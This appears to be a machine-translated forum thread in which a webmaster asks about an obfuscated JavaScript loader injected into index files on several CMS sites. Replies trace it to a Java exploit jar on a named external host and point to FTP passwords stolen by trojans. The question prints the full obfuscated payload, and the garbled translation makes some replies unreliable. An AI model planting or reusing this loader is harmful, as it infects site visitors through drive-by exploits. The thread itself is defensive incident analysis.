Hacking sites. Arbitrary code inserted?

0 like 0 dislike
70 views
Good day!


The other day on several sites on CodeIgniter, one for Joomla, one on Wordpress and one entirely without CMS was installed arbitrary code in the index file.*, home.*, page.*, auth.*. Ie, in each of the files was installed a script tag with an arbitrary code. Outwardly, it was displayed as an invitation to establish a new multimedia bun for the browser.


Actually, the script itself (no! sign in word of the script without line breaks — did not fit):
<sc!ript type="text/javascript" language="javascript"> wkllp="33933333339999333999339939993933 399993393993993339933939339333333999393339999339399933333 993393933999939339333933999393339933939399993333999393333 939999399333993999339939993399339333933399999333933399399 939333993393939993339399339333993939933933333399993993999 399939939339399339333999393339939333339993933393333333993 333399933333999933333999399399393333993393939939339399339 993993933339993933339993933393333333993333399933333999933 333999399399339933999339339933339399399393993393939933393 399399993999339339933933399339393999339333999393339333333 993999339939999339993993999399339939339399933993993933939 933393399393393993993339939339399939333999933933999393339 333333993933339939339399339333993393339933939399399933399 939939999939339999333393999939993399399939333999933939939 933399339393399999333999933399393393993399339993393399333 393993993939933939339333333993933939933933339999393393339 339993933399339393999333939933933399393993393339333933333 399933993999339339933399339999393393339339939333399939333 999393339993333339993933393999933939999399339933999399939 993339399933393999399939933939399339393999339339933999339 933993393999339933399399399993393999339933399399333993393 999939933339399339333393999339939393399933333993399933933 393339999933399993333939999399393393993399339993393399333 39399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te"; vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="; imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){ bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if( wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3; qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;}</sc!ript>



Direct link CI-Joomla-WP-чистыйHTML I do not see. Ie, apparently, it's not a critical vulnerability in any engine.


In the Apache logs for strange requests or even any queries in the modification time of the file no (+-10minutes).


Look suspicious logs auth.log (real username is changed; the ip from which the request came):
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - USER user: no such user found from dslb-094-222-057-074.pools.arcor-ip.net [::ffff:94.222.57.74] to ::ffff:89.108.126.42:21 
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - SECURITY VIOLATION: root login attempted.
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - SECURITY VIOLATION: root login attempted.

Feb 1 10:56:40 User proftpd[19762]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - USER webmaster1: Login successful.
Feb 1 10:56:40 User proftpd[19764]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - USER webmaster2: Login successful.
Feb 1 10:56:40 User proftpd[19762]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - FTP session closed.
Feb 1 10:56:40 User proftpd[19764]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - FTP session closed.



SSH closed by the firewall for everyone except me.


I want to ask the question — what could it be? How to avoid it? What other logs are needed for analysis?
by | 70 views

7 Answers

0 like 0 dislike
it was the password on FTP, probably. It is very likely that the app developer settled a Trojan that and gave the password to attackers.
How to protect yourself? Go to Linux at work strance :) Another option: some hosting companies offer to limit FTP access to certain IPS — take advantage of this opportunity.
And, of course, change the password on FTP after a thorough virus scan of all computers where the password might be.
by
0 like 0 dislike
After analyzing the code you gave me in PM:
thrown in the browser:
\r
document.write(''); 

This is a jump in the file gt32.co.cc/games/javaobe.jarwhich is defined as Exploit.Java.176
\rwww.virustotal.com/file-scan/report.html?id=8d240bc87e5de0abd6d5872698dd7bfa06bcfee26055e585fd7844fbf3d589a1-1296664900
\r
analiziram html:
\r
\r\r

the value of the variable is passed dskvnds Mjjdo##pjuAsVOsVV#wsdMdCRWuL&/W1
take a look at the file through a Java Decompiler:
\rchaketik.pastebin.com/PXkj4Q0J
\r
got so far only a few variables, I'm just digging for the first time in java code ;)
\r
koli=exe. ipol=ridpmt.oi.avaj bsde =eman.so bsda = .exe bsdz = java.io.tmpdir bsdc = os.name 

it is interesting that on the host to open ports
5222/tcp open jabber Jabber instant messaging server (Protocol 1.0)
5269/tcp open jabber Jabber instant messaging server (Protocol 1.0)
\r
keep digging)
by
0 like 0 dislike
Have deobfuscator your JavaScript, here's what happened:
\r
\r\r#teqdk\r{\rwidth: 0px;height: 0px;frameborder: no;visibility: hidden;\r}\r\r\r
by
0 like 0 dislike
Was on a normal hosting. What a month of 4 times. It seems the password was not saved (before it changed course), but which appeared again and again this crap.
Speculation fell on a hosting provider or our clients (but it is strange that all at once)
It was noticed that code was added after the tag
Only got rid of that steel output tag in part, like this:
\r
echo '';

Trojan stupidly did not found a tag and nothing added.
After changing the hosting provider, the problem does not recur, although the passwords were kept.
by
0 like 0 dislike
Maybe you redchilli remote code on some warez editor?
Himself faced with. Edited a bunch of broken files via dreamweaver and got all the files left variable y.
by
0 like 0 dislike
I had exactly the same story. On the computer two out of 6 users, who poured the content on the website was the Trojans. Passwords to ftp was potyrili of total commander. And users with foam on lips claimed that the computers they have clean, avast is running and "just now scanned for viruses." Helped the logs with ftp and disable the logins one by one.
\r
And from virus scanning only helps with booting from the live cd.
\r
The moral: don't trust the users, even if they are not criminals!
by
0 like 0 dislike
Granite system files last modified date.
by

Related questions

0 like 0 dislike
3 answers
0 like 0 dislike
3 answers
0 like 0 dislike
1 answer
asked May 2, 2019 by lynxp9
0 like 0 dislike
1 answer
0 like 0 dislike
3 answers
110,608 questions
257,186 answers
0 comments
32,718 users